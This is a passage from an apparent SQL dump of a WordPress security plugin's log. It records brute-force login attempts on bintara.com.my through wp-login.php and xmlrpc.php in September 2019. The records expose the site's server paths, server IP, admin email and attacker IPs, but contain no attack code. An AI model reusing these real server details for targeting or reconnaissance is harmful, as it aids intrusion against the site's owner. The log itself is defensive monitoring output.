20:20:08',18259576,19558384,'https://bintara.com.my/xmlrpc.php',1,0,'192.227.128.241'),(24257,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"192.227.128.241\";s:11:\"REMOTE_PORT\";s:5:\"46756\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-udGShanGhHYaqyCS87gAAAAA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568665204.645\";s:12:\"REQUEST_TIME\";s:10:\"1568665204\";}}','notice','2019-09-16 20:20:05','2019-09-16 20:20:05',17739432,19230400,'https://bintara.com.my/wp-login.php',1,0,'192.227.128.241'),(24256,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"51.38.128.211\";s:11:\"REMOTE_PORT\";s:5:\"44264\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-ts2ShanGhHYaqyCS8JAAAABc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568665011.6412\";s:12:\"REQUEST_TIME\";s:10:\"1568665011\";}}','notice','2019-09-16 20:16:52','2019-09-16 20:16:51',18260368,19556664,'https://bintara.com.my/xmlrpc.php',1,0,'51.38.128.211'),(24255,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"51.38.128.211\";s:11:\"REMOTE_PORT\";s:5:\"43856\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-tsGShanGhHYaqyCS8IQAAAAk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568665008.901\";s:12:\"REQUEST_TIME\";s:10:\"1568665008\";}}','notice','2019-09-16 20:16:50','2019-09-16 20:16:49',17740624,19232584,'https://bintara.com.my/wp-login.php',1,0,'51.38.128.211'),(24254,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"118.238.4.201\";s:11:\"REMOTE_PORT\";s:5:\"56171\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-sxWShanGhHYaqyCS6@wAAAAI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568664773.1555\";s:12:\"REQUEST_TIME\";s:10:\"1568664773\";}}','notice','2019-09-16 20:12:54','2019-09-16 20:12:53',18260296,19556664,'https://bintara.com.my/xmlrpc.php',1,0,'118.238.4.201'),(24253,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"118.238.4.201\";s:11:\"REMOTE_PORT\";s:5:\"57776\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-swmShanGhHYaqyCS6@AAAAAw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568664770.1502\";s:12:\"REQUEST_TIME\";s:10:\"1568664770\";}}','notice','2019-09-16 20:12:51','2019-09-16 20:12:50',17740728,19231592,'https://bintara.com.my/wp-login.php',1,0,'118.238.4.201'),(24252,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"51.75.205.104\";s:11:\"REMOTE_PORT\";s:5:\"57698\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-q0mShanGhHYaqyCS5OAAAABc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568664274.8852\";s:12:\"REQUEST_TIME\";s:10:\"1568664274\";}}','notice','2019-09-16 20:04:36','2019-09-16 20:04:35',18260296,19556664,'https://bintara.com.my/xmlrpc.php',1,0,'51.75.205.104'),(24251,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"51.75.205.104\";s:11:\"REMOTE_PORT\";s:5:\"57239\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-qz2ShanGhHYaqyCS5NAAAAAI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568664272.0824\";s:12:\"REQUEST_TIME\";s:10:\"1568664272\";}}','notice','2019-09-16 20:04:33','2019-09-16 20:04:32',17740728,19231592,'https://bintara.com.my/wp-login.php',1,0,'51.75.205.104'),(24250,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.134.39\";s:11:\"REMOTE_PORT\";s:5:\"33700\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-qmWkPXSyJlCUJQmokLgAAAYk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568664217.618\";s:12:\"REQUEST_TIME\";s:10:\"1568664217\";}}','notice','2019-09-16 20:03:38','2019-09-16 20:03:37',18259952,19556168,'https://bintara.com.my/xmlrpc.php',1,0,'162.144.134.39'),(24249,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.134.39\";s:11:\"REMOTE_PORT\";s:5:\"33326\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-qlmShanGhHYaqyCS4@wAAABA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568664214.4986\";s:12:\"REQUEST_TIME\";s:10:\"1568664214\";}}','notice','2019-09-16 20:03:36','2019-09-16 